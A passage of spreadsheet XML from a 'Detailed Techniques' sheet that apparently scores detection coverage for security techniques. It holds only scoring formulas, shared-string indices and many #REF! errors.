        <v>#REF!</v>
      </c>
      <c r="P157" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q157" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R157" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S157" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T157" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U157" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V157" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W157" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X157" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F157&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F157))-LEN(SUBSTITUTE(TRIM(F157),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y157" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="158" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A158" s="8" t="s">
        <v>80</v>
      </c>
      <c r="B158" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C158" s="25" t="s">
        <v>895</v>
      </c>
      <c r="D158" s="10" t="s">
        <v>896</v>
      </c>
      <c r="E158" s="10" t="s">
        <v>897</v>
      </c>
      <c r="F158" s="10" t="s">
        <v>429</v>
      </c>
      <c r="G158" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K158,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H158" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I158" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J158" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K158" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L158" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M158" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N158" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O158" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P158" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q158" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R158" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S158" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T158" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U158" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V158" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W158" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X158" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F158&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F158))-LEN(SUBSTITUTE(TRIM(F158),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y158" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="159" spans="1:25" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A159" s="8" t="s">
        <v>134</v>
      </c>
      <c r="B159" s="8" t="s">
        <v>710</v>
      </c>
      <c r="C159" s="25" t="s">
        <v>898</v>
      </c>
      <c r="D159" s="10" t="s">
        <v>899</v>
      </c>
      <c r="E159" s="10" t="s">
        <v>900</v>
      </c>
      <c r="F159" s="10" t="s">
        <v>901</v>
      </c>
      <c r="G159" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K159,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H159" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I159" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J159" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K159" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L159" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M159" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N159" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O159" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P159" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q159" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R159" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S159" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T159" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U159" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V159" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W159" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X159" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F159&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F159))-LEN(SUBSTITUTE(TRIM(F159),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y159" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="160" spans="1:25" ht="270.75" x14ac:dyDescent="0.45">
      <c r="A160" s="8" t="s">
        <v>149</v>
      </c>
      <c r="B160" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C160" s="25" t="s">
        <v>902</v>
      </c>
      <c r="D160" s="10" t="s">
        <v>903</v>
      </c>
      <c r="E160" s="10" t="s">
        <v>904</v>
      </c>
      <c r="F160" s="10" t="s">
        <v>871</v>
      </c>
      <c r="G160" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K160,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H160" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I160" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J160" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K160" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L160" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M160" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N160" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O160" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P160" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q160" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R160" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S160" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T160" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U160" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V160" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W160" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X160" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F160&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F160))-LEN(SUBSTITUTE(TRIM(F160),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y160" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="161" spans="1:25" ht="285" x14ac:dyDescent="0.45">
      <c r="A161" s="8" t="s">
        <v>105</v>
      </c>
      <c r="B161" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C161" s="25" t="s">
        <v>905</v>
      </c>
      <c r="D161" s="10" t="s">
        <v>906</v>
      </c>
      <c r="E161" s="10" t="s">
        <v>907</v>
      </c>
      <c r="F161" s="10" t="s">
        <v>908</v>
      </c>
      <c r="G161" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K161,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H161" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I161" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J161" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K161" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L161" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M161" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N161" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O161" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P161" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q161" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R161" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S161" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T161" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U161" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V161" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W161" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X161" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F161&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F161))-LEN(SUBSTITUTE(TRIM(F161),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y161" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="162" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A162" s="8" t="s">
        <v>167</v>
      </c>
      <c r="B162" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C162" s="25" t="s">
        <v>909</v>
      </c>
      <c r="D162" s="18" t="s">
        <v>910</v>
      </c>
      <c r="E162" s="10" t="s">
        <v>911</v>
      </c>
      <c r="F162" s="10" t="s">
        <v>912</v>
      </c>
      <c r="G162" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K162,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H162" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I162" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J162" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K162" s="51">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="L162" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M162" s="18" t="str">
        <f t="shared" si="17"/>
        <v>0-20</v>
      </c>
      <c r="N162" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O162" s="18" t="e">
        <f t="shared" si="18"/>
        <v>#REF!</v>
      </c>
      <c r="P162" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q162" s="18" t="e">
        <f t="shared" si="19"/>
        <v>#REF!</v>
      </c>
      <c r="R162" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S162" s="18" t="e">
        <f t="shared" si="20"/>
        <v>#REF!</v>
      </c>
      <c r="T162" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U162" s="18" t="e">
        <f t="shared" si="21"/>
        <v>#REF!</v>
      </c>
      <c r="V162" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W162" s="18" t="e">
        <f t="shared" si="22"/>
        <v>#REF!</v>
      </c>
      <c r="X162" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F162&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F162))-LEN(SUBSTITUTE(TRIM(F162),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y162" s="18" t="e">
        <f t="shared" si="23"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="163" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A163" s="8" t="s">
        <v>177</v>
      </c>
      <c r="B163" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C163" s="25" t="s">
        <v>913</v>
      </c>
      <c r="D163" s="18" t="s">
        <v>914</v>
      </c>
      <c r="E163" s="10" t="s">
        <v>915</v>
      </c>
      <c r="F163" s="10" t="s">
        <v>916</v>
      </c>
      <c r="G163" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K163,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H163" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I163" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F163&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F163))-LEN(SUBSTITUTE(TRIM(F163),",",""))+1),1)</f>
        <v>0</v>
      </c>
